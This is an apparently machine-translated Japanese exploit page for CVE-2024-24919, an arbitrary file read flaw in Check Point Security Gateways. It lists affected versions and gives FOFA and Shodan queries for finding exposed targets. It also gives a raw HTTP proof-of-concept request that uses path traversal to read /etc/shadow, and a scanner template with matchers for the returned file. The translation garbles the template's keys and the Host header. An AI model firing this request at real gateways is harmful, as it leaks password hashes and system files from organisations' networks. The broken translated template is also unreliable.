Check-Point Security Gateway におけるファイル任意読み取りの脆弱性 (CVE-2024-24919)
説明
Check Point Security Gateways は、チェック・ポイント・ソフトウェアが提供するネットワーク・セキュリティ・ソリューション・ファミリーである。次世代ファイアウォール(NGFW)、データセンター・セキュリティ・ゲートウェイ、AI を活用した量子ゲートウェイを含むこれらのソリューションは、複雑なサイバー脅威に対する高度な保護を組織に提供するよう設計されています。これらのソリューションは、統合的な脅威対策、統合的なセキュリティ管理、ポリシー・コントロールにより、ネットワーク、クラウド、モバイル、エンドポイントを保護します。
fofa
icon_hash="1440532452″
影響を受けるバージョン
チェック・ポイント・セキュリティ・ゲートウェイ R77.20 (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R77.30 (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R80.10 (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R80.20 (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R80.20.x
チェック・ポイント・セキュリティ・ゲートウェイ R80.20SP (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R80.30 (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R80.30SP (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R80.40 (EOL)
チェック・ポイント・セキュリティ・ゲートウェイ R81
チェック・ポイント・セキュリティ・ゲートウェイ R81.10
チェック・ポイント・セキュリティ・ゲートウェイ R81.10.x
チェック・ポイント・セキュリティ・ゲートウェイ R81.20
ポック
POST /clients/MyCRL HTTP/1.1
ホスト: ip
コンテンツ長:39aCSHELL/.../.../.../.../.../.../.../etc/shadow
poc yaml
ID: CVE-2024-24919
インフォメーション
name: Check Point Quantum Gateway - 情報公開
著者:Johnk3r
深刻度:高
説明:
CVE-2024-24919 は、情報漏えいの脆弱性であり、攻撃者は、IPSec VPN またはリモートアクセス VPN またはモバイルアクセスソフトウェアブレードで設定された、インターネットに接続されたゲートウェイ上の特定の情報にアクセスすることができます。で設定された特定の情報に攻撃者がアクセスできるようにする脆弱性です。
を参照されたい。
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://support.checkpoint.com/results/sk/sk182337
というメタデータがある。
最大リクエスト数: 1
ベンダー:チェックポイント
製品: quantum_security_gateway
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
shodan-query: html: "チェック・ポイントSSLネットワーク"
検証済み:真
tags: CVE, CVE2024, チェックポイント, LFIhttp。
- 生だ。
– |
POST /clients/MyCRL HTTP/1.1
ホスト:{{ホスト名}}aCSHELL/.../.../.../.../.../.../.../etc/shadow
マッチャー条件
マッチャーである。
- タイプ: 正規表現
部品: ボディ
正規表現。
- root:"
- "nobody:"
条件:そして- タイプ:ステータス
の状態だ。
– 200